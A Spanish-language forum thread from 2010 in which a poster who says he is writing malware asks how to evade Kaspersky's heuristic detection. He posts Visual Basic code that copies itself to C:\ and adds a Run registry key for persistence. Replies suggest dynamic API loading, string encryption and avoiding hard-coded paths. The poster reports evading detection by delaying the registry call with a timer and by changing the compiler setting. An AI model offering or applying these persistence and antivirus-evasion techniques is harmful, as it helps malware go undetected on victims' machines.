Problema con la Heuristica en Visual Basic.

Iniciado por A2Corp, 7 Julio 2010, 21:07 PM

0 Miembros y 1 Visitante están viendo este tema.

A2Corp

Buenas buenas...
Programando un malware me encuentro con un problema q antes no tenia.
Una de las funciones del malware es copiarse en una carpeta especifica y despues agregarse al registro para ejecutarse en un inicio.
Pero resulta que por esto Kaspersky me lo detecta como virus, lo curioso es que despues de hacer varias pruebas me di cuenta que es antivirus se da cuenta que la ruta a donde se copio el malware es la misma ruta que se creo en el registro y por eso lo considera virus.

Ya que si coloco una ruta cualquier como "c:\system\virus.exe" y en el registro pongo "c:\system\virusE.exe" no lo considera virus, pero si quito esa "E" extra si lo considera como malware :(

Probe entonces que se copiara como "virusE.exe" y luego otra funcion que le cambie el nombre a virus.exe para que funcionara el codigo del registro pero kaspersky es inteligente.............

Alguien tiene alguna idea para burlar la heuristica del kaspersky?
Hackeo, luego existo...


A2Corp

Call remember(&H80000001, "Software\Microsoft\Windows\CurrentVersion\Run", "Virus", "C:\Virus.exe")

Public Function remember(hKey As Long, strPath As String, strValue As String, strdata As String)
   Dim keyhand As Long
   Dim r As Long
   r = RegCreateKey(hKey, strPath, keyhand)
   r = RegSetValueEx(keyhand, strValue, 0, 1, ByVal strdata, Len(strdata))
   r = RegCloseKey(keyhand)
End Function


Public Function Mitosis()
 
   If App.Path = StrReverse("\:c") Then
   Exit Function



   Else
  FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\Virus.exe"
End
End If
End Function





Estos son los codigos q uso, pero por mas que lo modifico no funciona.
Hackeo, luego existo...

Jaixon Jax

  Las Apis RegCreateKey hay que cargarlas dinamicamente no se como sera en VB pero esas apis estan muy firmadas y las cadenas que usas en esas apis la podrias cifrar y descifrarla solo cuando las uses en la API y el nombre Virus.exe tambien puede alertar algunos AV


  Saludos ...

bizco

aparte de lo que te dicen, obten la ruta donde te copiaras en ejecucion y no pongas en el codigo letras de unidades.

A2Corp

Gracias por sus respuestas.
Por cierto lo del nombre del archivo (Virus) fue solo un ejemplo jejeje.

Di con la solucion colocando
este codigo:

Call remember(&H80000001, "Software\Microsoft\Windows\CurrentVersion\Run", "Virus", "C:\Virus.exe")


en un timer...
y ese timer en un principio estaria desactivado y una funcion lo activaria.

Asi aparece Clean en novirusthanks.org

:D
Hackeo, luego existo...

Jaixon Jax

Cita de: A2Corp en  7 Julio 2010, 22:36 PM
Gracias por sus respuestas.
Por cierto lo del nombre del archivo (Virus) fue solo un ejemplo jejeje.

Di con la solucion colocando
este codigo:

Call remember(&H80000001, "Software\Microsoft\Windows\CurrentVersion\Run", "Virus", "C:\Virus.exe")


en un timer...
y ese timer en un principio estaria desactivado y una funcion lo activaria.

Asi aparece Clean en novirusthanks.org

:D

  Eso tambien es valido la heuristica de Kaspersky dura pocos segundos y asi no le da chance de analizar ese trozo pero igual es algo rebuscado   :silbar:

  Saludos ......

A2Corp

Buenas, ahora tengo ua nueva duda....
Modificando el codigo de un viejo malware q habia escrito hace tiempo me di cuenta que era detectado por mi AV (el avira) fui quitando funciones para ver cual era la chismosita hasta que llegue a dejar el form vacio!!!!!!

y seguia cantando, entonces deje el proyecto sin form...... Y SEGUIA CANTANDO!
Llego a la conclusion que alguna propiedad del proyecto esta cantando :S la verdad me quede sin opciones por mas que trato de regresar el proyecto a los valores predeterminados sigue saltando mi antivirus como "troyan gen downloader" una cosa asi.


Cosa rara porque al hacer un proyecto desde cero no ocurre lo mismo.

Alguien me puede orientar?
Hackeo, luego existo...

A2Corp

Me respondo yo mismo...
Lei un articulo sobre falsos positivos y uno de los motivos es el tipo de packer q use el visualbasic y dicho y hecho...
Para este malware use el native code porque se reducia mucho el tamaño del archivo y ahora lo cambie como "fast code" y dejo de cantar.
:( aumentara unos cuantos kb de espacio pero ahora va calladito.
Hackeo, luego existo...